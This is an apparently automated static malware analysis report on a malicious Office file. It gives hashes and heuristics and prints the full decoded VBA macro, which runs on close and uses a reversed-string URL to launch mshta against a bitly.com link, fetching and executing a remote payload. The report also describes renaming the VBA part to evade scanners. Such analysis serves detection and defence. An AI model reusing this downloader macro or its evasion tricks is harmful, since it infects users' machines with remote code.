Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 69cbb88e679b72ea…

MALICIOUS

Office (OOXML)

14.1 KB First seen: 2021-06-20
MD5: 90d1650e5bfe5f3ef41b072961cb6a84 SHA-1: 201aa5d1ce0407bd5a98feec3f57e7ef659da468 SHA-256: 69cbb88e679b72eaec2dd5fb1f4ac70c976ca1ff2c0423b366b1afb38f14325b
68 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1203 Exploitation for Client Execution

The OOXML file contains a VBA project with an Auto_Close macro that is configured to execute a shell command. This macro constructs a URL by concatenating strings and then uses it to download a payload. The script attempts to download content from 'http://bitly.com/asdhjwqdoqiwodma' and execute it.

Heuristics 3

  • VBA project inside OOXML medium 2 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present (project part renamed away from vbaProject.bin: ppt/phosa.bin)
  • VBA project part renamed to evade filename detection high OOXML_VBA_PROJECT_RENAMED
    The VBA project is bound through the OOXML relationship/content type but its part is not named vbaProject.bin. Legitimate Office producers always emit vbaProject.bin; renaming it hides the macros from path-only scanners (observed in the SVCReady loader).
  • Auto_Close macro low OLE_VBA_AUTOCLOSE
    Auto_Close macro
    Matched line in script
    Attribute VB_Name = "Module2"
    Sub auto_close()

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 3205 bytes
SHA-256: 86c92b73efc1de885bf919e950ef6cd75c48da822f2fe6803f66393f5f2c0873
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Module2"
Sub auto_close()


Dim obj As New Class1
Dim obj2 As New Class2

obj.getName

obj2.MobileCall obj.n_name


End Sub




Attribute VB_Name = "Class1"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Public n_name As String

Public Function P_public() As String
P_public = "m"
End Function




Private Function ss(MyVar As Integer)
   Dim obj As Class2

  Dim b_public As String
   Select Case MyVar
      Case 1
         b_public = P_public + "shta " + StrReverse(".www//:ptth") + "bitly.com/asdhjwqdoqiwodma"
        
      Case 2
         b_public = "Get Value From Prime Numbers"
      Case 3
         b_public = "Get No Value as number"
      Case Else
         MsgBox "Unknown Number"
   End Select
   n_name = b_public
End Function




Public Function getName()
getName = ss(1)



End Function

Attribute VB_Name = "Class2"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Option Explicit
Private Type STARTUPINFO
cb As Long
lpReserved As String
lpDesktop As String
lpTitle As String
dwX As Long
dwY As Long
dwXSize As Long
dwYSize As Long
dwXCountChars As Long
dwYCountChars As Long
dwFillAttribute As Long
dwFlags As Long
wShowWindow As Integer
cbReserved2 As Integer
lpReserved2 As Long
hStdInput As Long
hStdOutput As Long
hStdError As Long
End Type

Private Type PROCESS_INFORMATION
hProcess As Long
hThread As Long
dwProcessID As Long
dwThreadID As Long
End Type

Private Declare Function WaitForSingleObject Lib "kernel32" (ByVal _
hHandle As Long, ByVal dwMilliseconds As Long) As Long

Private Declare Function CreateProcessA Lib "kernel32" (ByVal _
lpApplicationName As Long, ByVal lpCommandLine As String, ByVal _
lpProcessAttributes As Long, ByVal lpThreadAttributes As Long, _
ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, _
ByVal lpEnvironment As Long, ByVal lpCurrentDirectory As Long, _
lpStartupInfo As STARTUPINFO, lpProcessInformation As _
PROCESS_INFORMATION) As Long

Private Declare Function CloseHandle Lib "kernel32" (ByVal _
hObject As Long) As Long

Private Const NORMAL_PRIORITY_CLASS = &H20&
Private Const INFINITE = -1&



Public Sub MobileCall(cmdline As String)
Dim proc As PROCESS_INFORMATION
Dim start As STARTUPINFO
Dim ReturnValue As Integer

' Initialize the STARTUPINFO structure:
start.cb = Len(start)

' Start the shelled application:
ReturnValue = CreateProcessA(0&, cmdline$, 0&, 0&, 1&, _
NORMAL_PRIORITY_CLASS, 0&, 0&, start, proc)

' Wait for the shelled application to finish:
Do
ReturnValue = WaitForSingleObject(proc.hProcess, 0)
DoEvents
Loop Until ReturnValue <> 258

ReturnValue = CloseHandle(proc.hProcess)
End Sub
vbaProject_00.bin vba-project OOXML VBA project: ppt/phosa.bin 31744 bytes
SHA-256: 6493657b3db39e5f2c2c23ba1edc52b8e48e6ba13e1796220eceaac8e5741b7a